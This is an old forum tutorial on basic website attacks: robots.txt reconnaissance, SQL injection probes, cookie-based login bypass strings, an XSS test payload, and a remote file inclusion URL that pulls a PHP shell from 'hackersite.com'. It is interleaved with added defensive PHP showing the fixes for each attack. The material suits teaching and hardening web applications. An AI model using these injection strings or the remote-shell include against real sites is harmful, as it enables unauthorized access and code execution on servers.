Hack Websites & pentesting websites [basic tutorial]
2010-06-19, 6:55 PM
1. Check for robots.txt
The usual location is the site root:

Code:
http://www.site.com/robots.txt
   
       

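Not every site has one, but when it exists it can contain lots of info, and it often indicates where the admin directory is too.
robots.txt asks crawlers such as the Google bot to stay out of certain parts of a forum or a website. It is only a request to well-behaved bots, not access control: anyone can read the file and visit the paths it lists.

It looks like this:

Code: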
User-agent: *

Disallow: /forum/admin.php
Disallow: /forum/moderator.php
Disallow: /forum/include.php
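
For a site owner, the same file is worth auditing from the other side. The following is an added example, not part of the original post: it parses a robots.txt body and lists the Disallow entries whose names advertise sensitive endpoints. The keyword list and the function names are assumptions chosen for the demo.

```php
<?php
// Added example: audit a robots.txt body for Disallow entries that advertise
// sensitive endpoints. The keyword list is an assumption; tune it for your site.

function disallowed_paths(string $robots): array
{
    $paths = [];
    foreach (preg_split('/\R/', $robots) as $line) {
        $line = trim(preg_replace('/#.*$/', '', $line));   // strip comments
        if (preg_match('/^Disallow\s*:\s*(\S+)/i', $line, $m)) {
            $paths[] = $m[1];
        }
    }
    return $paths;
}

function revealing_paths(array $paths, array $keywords): array
{
    return array_values(array_filter($paths, function (string $p) use ($keywords): bool {
        foreach ($keywords as $k) {
            if (stripos($p, $k) !== false) {
                return true;
            }
        }
        return false;
    }));
}

// The sample file shown in the tutorial.
$robots = <<<TXT
User-agent: *

Disallow: /forum/admin.php
Disallow: /forum/moderator.php
Disallow: /forum/include.php
TXT;

$keywords = ['admin', 'moderator', 'login', 'backup', 'config', 'include'];
foreach (revealing_paths(disallowed_paths($robots), $keywords) as $path) {
    echo "robots.txt advertises $path: protect it with authentication, not a Disallow line\n";
}
```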
   
       


2. Check for SQL Injection vulnerabilities
This is done by putting a ' (apostrophe) at the end of a URL parameter, like this:

Code:
http://www.site.com/news.php?id=1'
   
       

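If you see some kind of database error, then most likely the site is vulnerable: the parameter is being pasted into the SQL statement unescaped, and the stray quote breaks its syntax.
This is classic, or error-based, SQL injection. We'll discuss blind SQL injection another time.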


3. Cookie poisoning
Even though most sites nowadays filter this, it wouldn't kill you to try.
We will do this... with JavaScript.
It's really simple; try this in the address bar:

Code:
javascript:alert(document.cookie);
   
       

In some cases this may spill out your username and password, if the site stores them in cookies.
This is the part where you try the famous line...

Code:
javascript:void(document.cookie="username='OR'1'=' 1"); void(document.cookie="password='OR'1'='1");
   
       

Similar to SQL injection, you guessed it: this only works if the site builds a SQL query from the cookie values without escaping them.
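
Why the apostrophe in step 2 and the cookie value in step 3 behave the way they do, and the fix for both, as an added example that is not from the original post. It assumes the pdo_sqlite extension; the tables, rows and function names are constructed for the demo.

```php
<?php
// Added example. Tables, columns and sample rows are constructed for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO news VALUES (1, 'Hello')");
$db->exec("CREATE TABLE users (username TEXT, password TEXT)");
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-password')");

// Vulnerable: request data is pasted into the SQL text.
function news_vulnerable(PDO $db, string $id): string
{
    try {
        $row = $db->query("SELECT title FROM news WHERE id = $id")->fetch();
        return $row ? $row['title'] : 'not found';
    } catch (PDOException $e) {
        return 'SQL error';   // the error page step 2 looks for
    }
}

function login_vulnerable(PDO $db, string $u, string $p): bool
{
    $sql = "SELECT COUNT(*) FROM users WHERE username='$u' AND password='$p'";
    return $db->query($sql)->fetchColumn() > 0;
}

// Hardened: placeholders keep the value out of the SQL grammar.
function news_safe(PDO $db, string $id): string
{
    $st = $db->prepare("SELECT title FROM news WHERE id = ?");
    $st->execute([$id]);
    $row = $st->fetch();
    return $row ? $row['title'] : 'not found';
}

// Plaintext compare only mirrors the scenario; real code uses password_verify().
function login_safe(PDO $db, string $u, string $p): bool
{
    $st = $db->prepare("SELECT COUNT(*) FROM users WHERE username = ? AND password = ?");
    $st->execute([$u, $p]);
    return $st->fetchColumn() > 0;
}

$quote  = "1'";          // id value from step 2
$cookie = "'OR'1'='1";   // password cookie value from step 3
var_dump(news_vulnerable($db, $quote), news_safe($db, $quote));
var_dump(login_vulnerable($db, $cookie, $cookie), login_safe($db, $cookie, $cookie));
```

Keeping credentials out of cookies altogether, and storing only a random server-side session ID there, removes the cookie as an input to the login query.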


4. Check if site is vulnerable to Cross-Site Scripting (XSS)
XSS and JavaScript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this into a web form or a similar input field.

Code:
<script>alert("awdwdadwd")</script>
   
       

If the site is vulnerable, you will get a popup message saying awdwdadwd (yes, this was random).
You can find more detailed articles on XSS on milw0rm or similar sites.
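
The popup appears when the page echoes input back without encoding it. An added example (not from the original post; the function names are hypothetical) showing the unencoded reflection beside the encoded one, plus a check that can be kept as a regression test:

```php
<?php
// Added example: reflecting a form field with and without output encoding.

// Vulnerable: the value is placed into the HTML as-is.
function render_vulnerable(string $name): string
{
    return "<p>Hello, $name</p>";
}

// Hardened: encode for the HTML context at the point of output.
function render_safe(string $name): string
{
    $enc = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Hello, $enc</p>";
}

// Regression check: does a marker reach the page as live markup?
function reflects_raw(callable $render, string $marker): bool
{
    return strpos($render($marker), $marker) !== false;
}

$probe = '<script>alert("awdwdadwd")</script>';   // the tutorial's test string
foreach (['render_vulnerable', 'render_safe'] as $fn) {
    printf("%-18s %s\n", $fn, reflects_raw($fn, $probe) ? 'REFLECTED RAW' : 'encoded');
    echo $fn($probe), "\n";
}
```

htmlspecialchars() covers HTML body text and quoted attributes; values written into JavaScript or URLs need the encoding for that context instead.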


5. Remote File Inclusion (RFI) -- My Fav!
RFI, or Remote File Inclusion, is where the attacker tries to inject his own PHP code into your PHP apps... and if he's successful, he can do whatever he wants on the server.
OK, so let's say we have a website coded in PHP and it uses something like page=page.html to decide which page is to be displayed. The code will look something like this:

Code:
<?php
  $file = $_GET['page']; // our page
  include($file);
?>
   
       

What this means is that whatever gets passed to page will get included inside the PHP page (fetching a URL this way also requires allow_url_include to be enabled in php.ini). It goes like this:

Code:
http://www.website.com/contact.php?page=http://www.hackersite.com/phpshell.txt?
   
       

The actual code the webserver is executing looks like this:

Code:
<?php
  $file = "http://www.hackersite.com/phpshell.txt?"; // $_GET['page'];
  include($file); // $file is the PHP shell
?>
   
       

We just executed our code on our targeted server.
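
The fix is to never pass request data to include(). An added example, not from the original post, that maps the page parameter onto a fixed allowlist; the page names, the pages/ directory and the function name are assumptions.

```php
<?php
// Added example: hardened replacement for include($_GET['page']).
// Page names and the pages/ directory are assumptions for the demo.

const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'news'    => 'news.php',
];

// Map the request parameter to a fixed local file, or null if it is not allowed.
function resolve_page(?string $param, string $baseDir): ?string
{
    if ($param === null || !array_key_exists($param, PAGES)) {
        return null;                 // URLs and unknown names all land here
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$param];
}

// Constructed inputs; the URL is the value used in the tutorial.
$tests = [
    'contact',
    'http://www.hackersite.com/phpshell.txt?',
    'page.html',
    null,
];
foreach ($tests as $t) {
    $path = resolve_page($t, __DIR__ . '/pages');
    printf("%-44s -> %s\n", var_export($t, true), $path ?? 'rejected (404)');
}

// In the real page:
//   $path = resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
//
// Defence in depth in php.ini (Off is the default since PHP 5.2):
//   allow_url_include = Off
```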
Well, this was all folks, hope you enjoyed.
Category: ./Hacking | Views: 5772 | Added by: Xhyn00b13 | Tags: Hacking | Rating: 0.0/0